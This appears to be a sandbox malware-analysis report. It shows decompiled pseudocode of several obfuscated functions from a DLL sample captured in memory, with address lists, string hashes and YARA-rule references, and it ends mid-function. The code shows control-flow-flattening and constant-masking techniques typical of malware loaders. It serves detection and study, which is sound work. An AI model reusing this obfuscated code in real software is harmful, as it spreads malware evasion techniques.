                                                                                                          Function 02B02D53, Relevance: 5.2, Strings: 4, Instructions: 221COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 99%
                                                                                                          			E02B02D53(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t237;
				intOrPtr _t238;
				intOrPtr _t239;
				void* _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				void* _t267;
				void* _t268;
				signed int* _t271;
				signed int* _t272;

				_t271 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0xb3680a;
				_v8 = 0x44a7b2;
				_v84 = 0x16e473;
				_v84 = _v84 | 0xff7fd6cb;
				_v84 = _v84 << 0xe;
				_v84 = _v84 ^ 0xfdb25567;
				_v88 = 0x1491df;
				_v88 = _v88 | 0x25bec09f;
				_v88 = _v88 + 0xf90e;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xcae39943;
				_v92 = 0xaddb4a;
				_v92 = _v92 ^ 0x38a1add8;
				_t267 = __edx;
				_t243 = __ecx;
				_t245 = 0x27;
				_t268 = 0x72ed85;
				_v92 = _v92 / _t245;
				_t246 = 0x26;
				_v92 = _v92 * 0x56;
				_v92 = _v92 ^ 0x7b991acf;
				_v36 = 0x41254;
				_v36 = _v36 ^ 0x82dbc96b;
				_v36 = _v36 ^ 0x82dd2337;
				_v28 = 0x754151;
				_v28 = _v28 + 0x3d65;
				_v28 = _v28 ^ 0x0076627a;
				_v76 = 0xa9aca8;
				_v76 = _v76 * 0x46;
				_v76 = _v76 << 0x10;
				_v76 = _v76 * 0x71;
				_v76 = _v76 ^ 0xcef7d733;
				_v80 = 0x19ef1d;
				_v80 = _v80 + 0x4807;
				_v80 = _v80 >> 0x10;
				_t247 = 9;
				_v80 = _v80 / _t246;
				_v80 = _v80 ^ 0x000e4732;
				_v32 = 0xb4891b;
				_v32 = _v32 | 0x91ee1565;
				_v32 = _v32 ^ 0x91f206c4;
				_v52 = 0xb65ed8;
				_v52 = _v52 ^ 0x53a92618;
				_v52 = _v52 * 0x77;
				_v52 = _v52 ^ 0xa3a75cc7;
				_v20 = 0xeecfa7;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x3bb2e2c4;
				_v72 = 0xfbd7a5;
				_v72 = _v72 ^ 0x9f68e208;
				_v72 = _v72 << 8;
				_v72 = _v72 | 0x30258995;
				_v72 = _v72 ^ 0xb3385db1;
				_v24 = 0x1aaffc;
				_v24 = _v24 * 0x36;
				_v24 = _v24 ^ 0x05ac1646;
				_v16 = 0xb69c42;
				_v16 = _v16 + 0x3887;
				_v16 = _v16 ^ 0x00b1c7d8;
				_v44 = 0x5789e3;
				_v44 = _v44 / _t247;
				_v44 = _v44 + 0xffffe7e6;
				_v44 = _v44 ^ 0x00087fde;
				_v68 = 0x94873;
				_v68 = _v68 << 0xf;
				_v68 = _v68 + 0xffff48e1;
				_v68 = _v68 ^ 0x69c9ade9;
				_v68 = _v68 ^ 0xcdf62ffc;
				_v48 = 0x208212;
				_v48 = _v48 | 0x39c03c72;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 ^ 0x0008cd3c;
				_v96 = 0x3b2be3;
				_v96 = _v96 ^ 0x07755c49;
				_v96 = _v96 >> 0xf;
				_v96 = _v96 ^ 0x076fdb2f;
				_v96 = _v96 ^ 0x07616547;
				_v100 = 0xac4dde;
				_v100 = _v100 + 0x3900;
				_t248 = 0x42;
				_v100 = _v100 * 0x54;
				_v100 = _v100 ^ 0x672a87d3;
				_v100 = _v100 ^ 0x5fb939da;
				_v104 = 0x9fab94;
				_v104 = _v104 ^ 0x81ae57b6;
				_v104 = _v104 | 0x48b65982;
				_v104 = _v104 * 0x3c;
				_v104 = _v104 ^ 0x471b6d30;
				_v56 = 0x9acae2;
				_v56 = _v56 << 3;
				_v56 = _v56 >> 0xf;
				_v56 = _v56 ^ 0x000181ed;
				_v60 = 0x9f5509;
				_v60 = _v60 / _t248;
				_v60 = _v60 >> 3;
				_v60 = _v60 + 0xfffff221;
				_v60 = _v60 ^ 0x000ffb1e;
				_v40 = 0x6ff3a2;
				_v40 = _v40 << 9;
				_v40 = _v40 + 0x9f22;
				_v40 = _v40 ^ 0xdfef744e;
				_v64 = 0xeafe6e;
				_v64 = _v64 ^ 0x9deccfb6;
				_v64 = _v64 << 0xf;
				_v64 = _v64 * 0x79;
				_v64 = _v64 ^ 0xc780890d;
				while(1) {
					L1:
					_t237 = 0xd8fe181;
					do {
						L2:
						while(_t268 != 0x72ed85) {
							if(_t268 == 0xb6c7232) {
								_t263 = _v44;
								_t248 = _v16;
								_t238 = E02B01005(_v16, _v44, _v68, _v48,  *((intOrPtr*)(_t267 + 0x38)));
								_t271 =  &(_t271[3]);
								 *((intOrPtr*)(_t267 + 0x2c)) = _t238;
								__eflags = _t238;
								_t237 = 0xd8fe181;
								_t268 =  !=  ? 0xd8fe181 : 0xd6f812a;
								continue;
							}
							if(_t268 == 0xc5020c9) {
								_push(_v36);
								_t239 = E02B03263(_v84, _v88, __eflags, _t243, _v92, _t248);
								_t272 =  &(_t271[4]);
								 *((intOrPtr*)(_t267 + 0x38)) = _t239;
								__eflags = _t239;
								if(_t239 != 0) {
									E02B0148A(_t239, _t239, _v28, _v76, _v80, _v32);
									_t263 = _v20;
									_t248 = _v52;
									E02AEE2BD(_v20, _v72,  *((intOrPtr*)(_t267 + 0x38)), _v24);
									_t271 =  &(_t272[7]);
									_t268 = 0xb6c7232;
									goto L1;
								}
							} else {
								if(_t268 == 0xd6f812a) {
									return E02AEF0E9(_v60,  *((intOrPtr*)(_t267 + 0x38)), _v40, _v64);
								}
								if(_t268 != _t237) {
									goto L13;
								} else {
									_t239 = E02AF0EBC(_v96, _t263, _v100, _v96, _v104, _v56, _v96, _t248, _t267, E02AFA2A5);
									_t271 =  &(_t271[8]);
									 *((intOrPtr*)(_t267 + 0x48)) = _t239;
									if(_t239 == 0) {
										_t268 = 0xd6f812a;
										while(1) {
											L1:
											_t237 = 0xd8fe181;
											goto L2;
										}
									}
								}
							}
							return _t239;
						}
						_t268 = 0xc5020c9;
						L13:
						__eflags = _t268 - 0x11d9bb5;
					} while (__eflags != 0);
					return _t237;
				}
			}








































                                                                                                          0x02b02d53
                                                                                                          0x02b02d56
                                                                                                          0x02b02d5b
                                                                                                          0x02b02d63
                                                                                                          0x02b02d6b
                                                                                                          0x02b02d73
                                                                                                          0x02b02d7b
                                                                                                          0x02b02d80
                                                                                                          0x02b02d88
                                                                                                          0x02b02d90
                                                                                                          0x02b02d98
                                                                                                          0x02b02da0
                                                                                                          0x02b02da5
                                                                                                          0x02b02dad
                                                                                                          0x02b02db5
                                                                                                          0x02b02dc7
                                                                                                          0x02b02dc9
                                                                                                          0x02b02dcb
                                                                                                          0x02b02dce
                                                                                                          0x02b02dd7
                                                                                                          0x02b02de2
                                                                                                          0x02b02de5
                                                                                                          0x02b02de9
                                                                                                          0x02b02df1
                                                                                                          0x02b02df9
                                                                                                          0x02b02e01
                                                                                                          0x02b02e09
                                                                                                          0x02b02e11
                                                                                                          0x02b02e19
                                                                                                          0x02b02e21
                                                                                                          0x02b02e2e
                                                                                                          0x02b02e32
                                                                                                          0x02b02e3c
                                                                                                          0x02b02e40
                                                                                                          0x02b02e48
                                                                                                          0x02b02e50
                                                                                                          0x02b02e58
                                                                                                          0x02b02e63
                                                                                                          0x02b02e64
                                                                                                          0x02b02e68
                                                                                                          0x02b02e70
                                                                                                          0x02b02e78
                                                                                                          0x02b02e80
                                                                                                          0x02b02e88
                                                                                                          0x02b02e90
                                                                                                          0x02b02e9d
                                                                                                          0x02b02ea1
                                                                                                          0x02b02ea9
                                                                                                          0x02b02eb1
                                                                                                          0x02b02eb6
                                                                                                          0x02b02ebe
                                                                                                          0x02b02ec6
                                                                                                          0x02b02ece
                                                                                                          0x02b02ed3
                                                                                                          0x02b02edb
                                                                                                          0x02b02ee3
                                                                                                          0x02b02ef0
                                                                                                          0x02b02ef4
                                                                                                          0x02b02efc
                                                                                                          0x02b02f04
                                                                                                          0x02b02f0c
                                                                                                          0x02b02f16
                                                                                                          0x02b02f26
                                                                                                          0x02b02f2c
                                                                                                          0x02b02f39
                                                                                                          0x02b02f41
                                                                                                          0x02b02f49
                                                                                                          0x02b02f4e
                                                                                                          0x02b02f56
                                                                                                          0x02b02f5e
                                                                                                          0x02b02f66
                                                                                                          0x02b02f6e
                                                                                                          0x02b02f76
                                                                                                          0x02b02f7b
                                                                                                          0x02b02f83
                                                                                                          0x02b02f8b
                                                                                                          0x02b02f93
                                                                                                          0x02b02f98
                                                                                                          0x02b02fa0
                                                                                                          0x02b02fa8
                                                                                                          0x02b02fb0
                                                                                                          0x02b02fbd
                                                                                                          0x02b02fbe
                                                                                                          0x02b02fc2
                                                                                                          0x02b02fca
                                                                                                          0x02b02fd2
                                                                                                          0x02b02fda
                                                                                                          0x02b02fe2
                                                                                                          0x02b02fef
                                                                                                          0x02b02ff3
                                                                                                          0x02b02ffb
                                                                                                          0x02b03003
                                                                                                          0x02b03008
                                                                                                          0x02b0300d
                                                                                                          0x02b03015
                                                                                                          0x02b03023
                                                                                                          0x02b03027
                                                                                                          0x02b0302c
                                                                                                          0x02b03034
                                                                                                          0x02b0303c
                                                                                                          0x02b03044
                                                                                                          0x02b03049
                                                                                                          0x02b03051
                                                                                                          0x02b03059
                                                                                                          0x02b03061
                                                                                                          0x02b03069
                                                                                                          0x02b03073
                                                                                                          0x02b03077
                                                                                                          0x02b0307f
                                                                                                          0x02b0307f
                                                                                                          0x02b0307f
                                                                                                          0x02b03084
                                                                                                          0x00000000
                                                                                                          0x02b03084
                                                                                                          0x02b03096
                                                                                                          0x02b03155
                                                                                                          0x02b03159
                                                                                                          0x02b0315d
                                                                                                          0x02b03162
                                                                                                          0x02b03165
                                                                                                          0x02b03168
                                                                                                          0x02b0316c
                                                                                                          0x02b03171
                                                                                                          0x00000000
                                                                                                          0x02b03171
                                                                                                          0x02b030a2
                                                                                                          0x02b030e4
                                                                                                          0x02b030f6
                                                                                                          0x02b030fb
                                                                                                          0x02b030fe
                                                                                                          0x02b03101
                                                                                                          0x02b03103
                                                                                                          0x02b0311d
                                                                                                          0x02b0312d
                                                                                                          0x02b03134
                                                                                                          0x02b03138
                                                                                                          0x02b0313d
                                                                                                          0x02b03140
                                                                                                          0x00000000
                                                                                                          0x02b03140
                                                                                                          0x02b030a4
                                                                                                          0x02b030a6
                                                                                                          0x00000000
                                                                                                          0x02b031a1
                                                                                                          0x02b030ae
                                                                                                          0x00000000
                                                                                                          0x02b030b4
                                                                                                          0x02b030cd
                                                                                                          0x02b030d2
                                                                                                          0x02b030d5
                                                                                                          0x02b030da
                                                                                                          0x02b030e0
                                                                                                          0x02b0307f
                                                                                                          0x02b0307f
                                                                                                          0x02b0307f
                                                                                                          0x00000000
                                                                                                          0x02b0307f
                                                                                                          0x02b0307f
                                                                                                          0x02b030da
                                                                                                          0x02b030ae
                                                                                                          0x02b031a9
                                                                                                          0x02b031a9
                                                                                                          0x02b03179
                                                                                                          0x02b0317e
                                                                                                          0x02b0317e
                                                                                                          0x02b0317e
                                                                                                          0x00000000
                                                                                                          0x02b03084

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $P$sH$zbv$+;
                                                                                                          • API String ID: 0-3806253346
                                                                                                          • Opcode ID: deead6a38ebe4623c9f1cf96095485d5489594f69c7999b415de55557f49b32c
                                                                                                          • Instruction ID: c42786b86054f1b20e333adc2d2ab04a92cb23dd8f4ea6e583eeff60d010731c
                                                                                                          • Opcode Fuzzy Hash: deead6a38ebe4623c9f1cf96095485d5489594f69c7999b415de55557f49b32c
                                                                                                          • Instruction Fuzzy Hash: 4BB10E72508381AFD359CF61C58A81BFBE2FBC4358F509A1DF59686260E3B1C949CF82
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFE4E5, Relevance: 5.2, Strings: 4, Instructions: 220COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 94%
                                                                                                          			E02AFE4E5(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				intOrPtr _v80;
				intOrPtr _v92;
				intOrPtr _v124;
				intOrPtr _v140;
				char _v152;
				char _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				unsigned int _v200;
				void* __ecx;
				void* _t118;
				signed int _t141;
				void* _t151;
				intOrPtr _t166;
				intOrPtr _t182;
				signed int _t183;
				intOrPtr _t184;
				signed int* _t187;
				void* _t189;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E02AFFE29(_t118);
				_v196 = 0x42a34f;
				_t187 =  &(( &_v200)[5]);
				_v196 = _v196 + 0xffffd591;
				_v196 = _v196 >> 8;
				_t182 = 0;
				_v196 = _v196 >> 0xd;
				_t151 = 0x8265549;
				_v196 = _v196 ^ 0x000e54fd;
				_v192 = 0xf4ad66;
				_t183 = 0x28;
				_v192 = _v192 * 0x74;
				_v192 = _v192 + 0xffff9a5e;
				_v192 = _v192 * 0x25;
				_v192 = _v192 ^ 0x06100388;
				_v164 = 0xada112;
				_v164 = _v164 << 6;
				_v164 = _v164 ^ 0x2b616de0;
				_v188 = 0x6e3b94;
				_v188 = _v188 * 0x6f;
				_v188 = _v188 ^ 0xb2fa2ce6;
				_v188 = _v188 >> 2;
				_v188 = _v188 ^ 0x27407061;
				_v184 = 0x76ba26;
				_v184 = _v184 ^ 0xa3b8c1ec;
				_v184 = _v184 * 6;
				_v184 = _v184 ^ 0xd6d91427;
				_v172 = 0x136254;
				_v172 = _v172 + 0x2ded;
				_v172 = _v172 ^ 0x001b6319;
				_v200 = 0xa09af9;
				_v200 = _v200 + 0x31d;
				_v200 = _v200 + 0xffff390b;
				_v200 = _v200 >> 0xc;
				_v200 = _v200 ^ 0x000c9fcd;
				_v176 = 0xee2a82;
				_v176 = _v176 / _t183;
				_v176 = _v176 ^ 0x000a5024;
				_t66 =  &_v176; // 0xa5024
				_t184 =  *_t66;
				_v180 = 0xbc2dba;
				_v180 = _v180 << 0xa;
				_v180 = _v180 << 0xc;
				_v180 = _v180 ^ 0x6e88cd95;
				_v168 = 0x8f86b;
				_v168 = _v168 * 0x73;
				_v168 = _v168 ^ 0x040961a3;
				while(1) {
					_t189 = _t151 - 0x90fe06e;
					if(_t189 > 0) {
						goto L23;
					}
					L2:
					if(_t189 == 0) {
						__eflags = _v140 - 3;
						if(__eflags == 0) {
							E02B000EF( &_v152);
							L16:
							_t151 = 0x574a4dd;
							continue;
							do {
								while(1) {
									_t189 = _t151 - 0x90fe06e;
									if(_t189 > 0) {
										goto L23;
									}
									goto L2;
								}
								L45:
								__eflags = _t151 - 0x4105f99;
							} while (__eflags != 0);
							L46:
							return _t182;
						}
						_t151 = 0xaf84b7f;
						while(1) {
							_t189 = _t151 - 0x90fe06e;
							if(_t189 > 0) {
								goto L23;
							}
							goto L2;
						}
						goto L23;
					}
					if(_t151 == 0x172cdb8) {
						_push(_t151);
						_push(_t151);
						_t184 = E02AEC5D8(0x5c);
						_t187 =  &(_t187[3]);
						__eflags = _t184;
						if(__eflags == 0) {
							L14:
							_t151 = 0x666f2cd;
							continue;
						}
						 *((intOrPtr*)(_t184 + 0x30)) = _v80;
						 *((intOrPtr*)(_t184 + 8)) = _v124;
						 *((intOrPtr*)(_t184 + 4)) = _v92;
						_t151 = 0xc6d3ff5;
						continue;
					}
					if(_t151 == 0x2270dbc) {
						__eflags = _v140 - 7;
						if(__eflags == 0) {
							E02AF7D5B( &_v152);
						}
						goto L16;
					}
					if(_t151 == 0x39f0156) {
						__eflags = E02AF9D3E( &_v60, _v164, __eflags, _v188,  &_v160);
						if(__eflags == 0) {
							goto L46;
						}
						goto L14;
					}
					if(_t151 == 0x574a4dd) {
						_t166 =  *0x2b06210; // 0x0
						_t182 = _t182 + 1;
						__eflags = _t182;
						 *((intOrPtr*)(_t184 + 0x24)) =  *((intOrPtr*)(_t166 + 0x210));
						 *((intOrPtr*)(_t166 + 0x210)) = _t184;
						L12:
						_t151 = 0x39f0156;
						continue;
					}
					if(_t151 == 0x666f2cd) {
						_t141 = E02AF8806(_v184, _v172,  &_v160,  &_v152);
						asm("sbb ecx, ecx");
						_t151 = ( ~_t141 & 0xfdd3cc62) + 0x39f0156;
						continue;
					}
					if(_t151 != 0x8265549) {
						goto L45;
					}
					E02AE22A6(_a4, _v196,  &_v60, _v192);
					_t187 =  &(_t187[2]);
					_t151 = 0xf4b2976;
					continue;
					L23:
					__eflags = _t151 - 0x9a4295f;
					if(_t151 == 0x9a4295f) {
						__eflags = _v140 - 5;
						if(__eflags == 0) {
							E02B02D53( &_v152, _t184);
							_t151 = 0x574a4dd;
							goto L45;
						}
						_t151 = 0xa7bb9ce;
						continue;
					}
					__eflags = _t151 - 0xa7bb9ce;
					if(_t151 == 0xa7bb9ce) {
						__eflags = _v140 - 6;
						if(__eflags == 0) {
							E02AFA474( &_v152);
							goto L16;
						}
						_t151 = 0x2270dbc;
						continue;
					}
					__eflags = _t151 - 0xaf84b7f;
					if(_t151 == 0xaf84b7f) {
						__eflags = _v140 - 4;
						if(__eflags == 0) {
							E02AE238C( &_v152);
							goto L16;
						}
						_t151 = 0x9a4295f;
						continue;
					}
					__eflags = _t151 - 0xbf40480;
					if(_t151 == 0xbf40480) {
						__eflags = _v140 - 2;
						if(__eflags == 0) {
							E02AFCCD9( &_v152, _t184);
							goto L16;
						}
						_t151 = 0x90fe06e;
						continue;
					}
					__eflags = _t151 - 0xc6d3ff5;
					if(_t151 == 0xc6d3ff5) {
						__eflags = _v140 - 1;
						if(__eflags == 0) {
							E02AEA871( &_v152);
							goto L16;
						}
						_t151 = 0xbf40480;
						continue;
					}
					__eflags = _t151 - 0xf4b2976;
					if(_t151 != 0xf4b2976) {
						goto L45;
					}
					E02AEB820(0);
					goto L12;
				}
			}






























                                                                                                          0x02afe4ef
                                                                                                          0x02afe4f6
                                                                                                          0x02afe4fd
                                                                                                          0x02afe504
                                                                                                          0x02afe506
                                                                                                          0x02afe50b
                                                                                                          0x02afe513
                                                                                                          0x02afe516
                                                                                                          0x02afe520
                                                                                                          0x02afe525
                                                                                                          0x02afe527
                                                                                                          0x02afe52c
                                                                                                          0x02afe531
                                                                                                          0x02afe53e
                                                                                                          0x02afe552
                                                                                                          0x02afe553
                                                                                                          0x02afe557
                                                                                                          0x02afe564
                                                                                                          0x02afe568
                                                                                                          0x02afe570
                                                                                                          0x02afe578
                                                                                                          0x02afe57d
                                                                                                          0x02afe585
                                                                                                          0x02afe592
                                                                                                          0x02afe596
                                                                                                          0x02afe59e
                                                                                                          0x02afe5a3
                                                                                                          0x02afe5ab
                                                                                                          0x02afe5b3
                                                                                                          0x02afe5c0
                                                                                                          0x02afe5c4
                                                                                                          0x02afe5cc
                                                                                                          0x02afe5d4
                                                                                                          0x02afe5dc
                                                                                                          0x02afe5e4
                                                                                                          0x02afe5ec
                                                                                                          0x02afe5f4
                                                                                                          0x02afe5fc
                                                                                                          0x02afe601
                                                                                                          0x02afe609
                                                                                                          0x02afe617
                                                                                                          0x02afe61b
                                                                                                          0x02afe623
                                                                                                          0x02afe623
                                                                                                          0x02afe627
                                                                                                          0x02afe62f
                                                                                                          0x02afe634
                                                                                                          0x02afe639
                                                                                                          0x02afe641
                                                                                                          0x02afe64e
                                                                                                          0x02afe652
                                                                                                          0x02afe65a
                                                                                                          0x02afe65a
                                                                                                          0x02afe660
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02afe666
                                                                                                          0x02afe666
                                                                                                          0x02afe79d
                                                                                                          0x02afe7a2
                                                                                                          0x02afe7b2
                                                                                                          0x02afe747
                                                                                                          0x02afe747
                                                                                                          0x02afe749
                                                                                                          0x02afe65a
                                                                                                          0x02afe65a
                                                                                                          0x02afe65a
                                                                                                          0x02afe660
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02afe660
                                                                                                          0x02afe89d
                                                                                                          0x02afe89d
                                                                                                          0x02afe89d
                                                                                                          0x02afe8a9
                                                                                                          0x02afe8b5
                                                                                                          0x02afe8b5
                                                                                                          0x02afe7a4
                                                                                                          0x02afe65a
                                                                                                          0x02afe65a
                                                                                                          0x02afe660
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02afe660
                                                                                                          0x00000000
                                                                                                          0x02afe65a
                                                                                                          0x02afe672
                                                                                                          0x02afe769
                                                                                                          0x02afe76a
                                                                                                          0x02afe772
                                                                                                          0x02afe774
                                                                                                          0x02afe777
                                                                                                          0x02afe779
                                                                                                          0x02afe736
                                                                                                          0x02afe736
                                                                                                          0x00000000
                                                                                                          0x02afe736
                                                                                                          0x02afe782
                                                                                                          0x02afe789
                                                                                                          0x02afe790
                                                                                                          0x02afe793
                                                                                                          0x00000000
                                                                                                          0x02afe793
                                                                                                          0x02afe67e
                                                                                                          0x02afe740
                                                                                                          0x02afe745
                                                                                                          0x02afe752
                                                                                                          0x02afe752
                                                                                                          0x00000000
                                                                                                          0x02afe745
                                                                                                          0x02afe686
                                                                                                          0x02afe72e
                                                                                                          0x02afe730
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02afe730
                                                                                                          0x02afe68e
                                                                                                          0x02afe6f6
                                                                                                          0x02afe6fc
                                                                                                          0x02afe6fc
                                                                                                          0x02afe703
                                                                                                          0x02afe706
                                                                                                          0x02afe70c
                                                                                                          0x02afe70c
                                                                                                          0x00000000
                                                                                                          0x02afe70c
                                                                                                          0x02afe696
                                                                                                          0x02afe6dc
                                                                                                          0x02afe6e7
                                                                                                          0x02afe6ef
                                                                                                          0x00000000
                                                                                                          0x02afe6ef
                                                                                                          0x02afe69e
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02afe6bb
                                                                                                          0x02afe6c0
                                                                                                          0x02afe6c3
                                                                                                          0x00000000
                                                                                                          0x02afe7b9
                                                                                                          0x02afe7b9
                                                                                                          0x02afe7bf
                                                                                                          0x02afe87f
                                                                                                          0x02afe884
                                                                                                          0x02afe896
                                                                                                          0x02afe89b
                                                                                                          0x00000000
                                                                                                          0x02afe89b
                                                                                                          0x02afe886
                                                                                                          0x00000000
                                                                                                          0x02afe886
                                                                                                          0x02afe7c5
                                                                                                          0x02afe7cb
                                                                                                          0x02afe860
                                                                                                          0x02afe865
                                                                                                          0x02afe875
                                                                                                          0x00000000
                                                                                                          0x02afe875
                                                                                                          0x02afe867
                                                                                                          0x00000000
                                                                                                          0x02afe867
                                                                                                          0x02afe7d1
                                                                                                          0x02afe7d7
                                                                                                          0x02afe841
                                                                                                          0x02afe846
                                                                                                          0x02afe856
                                                                                                          0x00000000
                                                                                                          0x02afe856
                                                                                                          0x02afe848
                                                                                                          0x00000000
                                                                                                          0x02afe848
                                                                                                          0x02afe7d9
                                                                                                          0x02afe7df
                                                                                                          0x02afe820
                                                                                                          0x02afe825
                                                                                                          0x02afe837
                                                                                                          0x00000000
                                                                                                          0x02afe837
                                                                                                          0x02afe827
                                                                                                          0x00000000
                                                                                                          0x02afe827
                                                                                                          0x02afe7e1
                                                                                                          0x02afe7e7
                                                                                                          0x02afe801
                                                                                                          0x02afe806
                                                                                                          0x02afe816
                                                                                                          0x00000000
                                                                                                          0x02afe816
                                                                                                          0x02afe808
                                                                                                          0x00000000
                                                                                                          0x02afe808
                                                                                                          0x02afe7e9
                                                                                                          0x02afe7ef
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02afe7f7
                                                                                                          0x00000000
                                                                                                          0x02afe7f7

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $P$ap@'$-$ma+
                                                                                                          • API String ID: 0-1845766705
                                                                                                          • Opcode ID: a370cf480b70d706f115340ec962568489f412e1c6a92545c6f135aa8b2d3361
                                                                                                          • Instruction ID: cd85b9f710f436355542682e98280fa00e189a53298df8ed9ae7ccda8a2ebe38
                                                                                                          • Opcode Fuzzy Hash: a370cf480b70d706f115340ec962568489f412e1c6a92545c6f135aa8b2d3361
                                                                                                          • Instruction Fuzzy Hash: CE916B71108345CBC6A8DF94C69892EBBF6FBD4308F04491EF69656260DB789A49CF83
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF3EAA, Relevance: 5.2, Strings: 4, Instructions: 152COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 98%
                                                                                                          			E02AF3EAA() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _t134;
				void* _t136;
				signed int _t139;
				signed int _t140;
				void* _t141;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				void* _t162;
				signed int _t163;
				signed int* _t164;

				_t164 =  &_v572;
				_v540 = 0x8ebbe1;
				_v540 = _v540 ^ 0xad58d7a7;
				_t141 = 0x14ab4b7;
				_v540 = _v540 + 0xffffedc9;
				_v540 = _v540 ^ 0xadd357de;
				_v568 = 0x9c9bda;
				_v568 = _v568 | 0x36ff3ceb;
				_v568 = _v568 << 9;
				_v568 = _v568 << 0xc;
				_v568 = _v568 ^ 0xff6ebe8a;
				_v572 = 0xc63a18;
				_t158 = 0x35;
				_v572 = _v572 / _t158;
				_v572 = _v572 + 0x3c6e;
				_t162 = 0;
				_t159 = 9;
				_v572 = _v572 * 0x2b;
				_v572 = _v572 ^ 0x00acfd7d;
				_v564 = 0xeb3370;
				_v564 = _v564 + 0xdf6d;
				_v564 = _v564 + 0xffff5689;
				_v564 = _v564 + 0xffff8af1;
				_v564 = _v564 ^ 0x00e2fb3e;
				_v556 = 0xcf22db;
				_v556 = _v556 + 0xdc1c;
				_v556 = _v556 ^ 0xabcda180;
				_v556 = _v556 * 0x79;
				_v556 = _v556 ^ 0xd41378ff;
				_v536 = 0x8b65e6;
				_v536 = _v536 >> 4;
				_v536 = _v536 | 0x892333f7;
				_v536 = _v536 ^ 0x8920b82e;
				_v552 = 0x92756e;
				_v552 = _v552 >> 9;
				_v552 = _v552 ^ 0x00055fbe;
				_v548 = 0xae9165;
				_v548 = _v548 >> 8;
				_v548 = _v548 << 3;
				_v548 = _v548 ^ 0x000d4470;
				_v560 = 0x7e7234;
				_t163 = _v552;
				_t140 = _v552;
				_v560 = _v560 * 0x4b;
				_v560 = _v560 * 0x7e;
				_v560 = _v560 / _t159;
				_v560 = _v560 ^ 0x06ab9265;
				_v524 = 0x1cfeb9;
				_v524 = _v524 + 0xfb24;
				_v524 = _v524 ^ 0x001447a0;
				_v532 = 0x9f8444;
				_t160 = 0x41;
				_t161 = _v552;
				_v532 = _v532 / _t160;
				_v532 = _v532 ^ 0x00060648;
				_v528 = 0xb53968;
				_v528 = _v528 >> 6;
				_v528 = _v528 ^ 0x00025f1c;
				while(_t141 != 0x6ff509) {
					if(_t141 == 0x14ab4b7) {
						_t141 = 0x9db1fde;
						continue;
					} else {
						if(_t141 == 0x18d2c7e) {
							_t140 = E02AF09DD(_v536,  &_v520, _v552, _v548);
							_t141 = 0x3c9aed4;
							continue;
						} else {
							if(_t141 == 0x3c9aed4) {
								_t134 = E02AEEFE1(_v524, _v532, _v528, _t140);
								_t164 =  &(_t164[3]);
								_t163 = _t134;
								_t141 = 0x6ff509;
								continue;
							} else {
								if(_t141 == 0x65dbbcc) {
									_push(_t141);
									_t136 = E02AF0ABA(_v568, _v572, __eflags, _v564,  &_v520, _t161, _v556);
									_t164 =  &(_t164[5]);
									__eflags = _t136;
									if(__eflags != 0) {
										_t141 = 0x18d2c7e;
										continue;
									}
								} else {
									if(_t141 != 0x9db1fde) {
										L15:
										__eflags = _t141 - 0xdb9fdb2;
										if(__eflags != 0) {
											continue;
										}
									} else {
										_t139 = E02AEDD35();
										_t161 = _t139;
										if(_t139 != 0) {
											_t141 = 0x65dbbcc;
											continue;
										}
